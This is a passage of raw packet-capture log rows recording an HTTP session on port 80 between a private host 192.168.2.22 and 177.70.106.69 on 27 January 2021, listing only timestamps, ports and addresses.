Jan 27, 2021 19:09:19.784353018 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.784377098 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785221100 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785267115 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785305023 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785315990 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785345078 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785363913 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785408974 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785429001 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785470963 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785490036 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785507917 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785525084 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785543919 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785561085 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785583973 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785590887 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785623074 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785648108 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785660982 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785686970 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785700083 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785721064 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785734892 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785758018 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785770893 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785787106 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785805941 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785816908 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785841942 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785881042 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785900116 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785906076 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785917997 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785934925 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785947084 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785972118 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.785973072 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.785995960 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786010981 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786027908 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786048889 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786066055 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786077976 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786101103 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786103964 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786140919 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786156893 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786175966 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786186934 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786211967 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786242008 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786247969 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786276102 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786283970 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786309004 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786317110 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786344051 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786350965 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786377907 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786385059 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786413908 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786427021 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786448002 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786463976 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786485910 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786499977 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786524057 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786534071 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786559105 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786569118 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786595106 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786596060 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786621094 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786629915 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786653996 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786683083 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786708117 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786711931 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786731958 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786750078 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786761045 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786787987 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786791086 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786812067 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786828995 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786834955 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786868095 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786869049 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786901951 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786902905 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786938906 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.786940098 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786977053 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.786978006 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.787004948 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.787014961 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.787030935 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.787054062 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.787059069 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.787087917 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:19.787105083 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:19.787286997 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.051789045 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.051830053 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.051855087 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.051855087 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.051877975 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.051877975 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.051888943 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.051908970 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052181959 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052202940 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052223921 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052231073 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052242994 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052246094 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052262068 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052268982 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052284002 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052289963 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052311897 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052316904 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052336931 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052337885 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052356958 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052362919 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052371979 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052386045 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052405119 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052408934 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052423954 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052432060 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052447081 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052453995 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052472115 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052478075 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052493095 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052503109 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052521944 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052526951 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052534103 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052551985 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052562952 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052576065 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052580118 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052598000 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052612066 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052617073 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052629948 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052637100 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052650928 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052656889 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052678108 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052685976 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052690983 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052702904 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052719116 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052723885 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052745104 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052762032 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052764893 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052767992 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052786112 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052788973 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052805901 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052805901 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052823067 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052826881 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052843094 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052848101 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052866936 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052870989 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052882910 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052894115 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052902937 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052913904 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052928925 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052932978 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052953959 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052953959 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052973032 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.052974939 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052983999 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.052994967 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053002119 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053014994 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053035975 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053037882 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053059101 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053061008 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053067923 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053080082 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053083897 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053098917 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053114891 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053117990 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053133011 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053138971 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053150892 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053158998 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053169966 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053179026 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053189039 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053201914 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053224087 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053224087 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053246021 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053266048 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053275108 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053286076 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053289890 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053306103 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053307056 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053327084 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053328037 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053348064 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053349018 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053369999 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053371906 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053415060 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053426981 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053437948 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053437948 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053457022 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053458929 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053473949 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053478956 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053493023 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053499937 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053519964 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053524017 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053534031 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053545952 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053556919 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053566933 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053587914 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053596973 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053608894 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053622007 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053627014 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053639889 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053647995 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053659916 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053668976 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053683043 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053694010 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053703070 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053716898 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053735971 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053740978 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053756952 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053759098 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053776026 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053793907 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053801060 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053806067 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053813934 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053813934 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053832054 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053834915 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053848028 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053858042 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053874016 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053880930 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053900957 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.053921938 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.053930044 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.071646929 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071677923 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071701050 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071701050 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.071718931 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.071723938 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071742058 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.071751118 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071769953 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.071774960 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071787119 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.071799994 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071837902 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071854115 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.071861029 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071875095 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.071882010 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071882963 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.071904898 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.071906090 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071926117 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.071928024 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071947098 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.071953058 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071971893 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071975946 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.071994066 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.071999073 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072016954 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072016954 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072038889 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072038889 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072058916 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072061062 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072077990 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072082996 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072094917 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072103024 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072127104 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072129965 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072149992 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072150946 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072165012 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072173119 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072195053 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072196960 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072215080 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072216034 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072235107 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072237015 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072258949 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072259903 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072277069 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072287083 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072298050 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072307110 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072319984 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072320938 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072336912 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072341919 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072356939 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072357893 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072374105 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072381020 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072387934 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072401047 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072422981 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072423935 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072437048 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072447062 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072463989 CET	49168	80	192.168.2.22	177.70.106.69
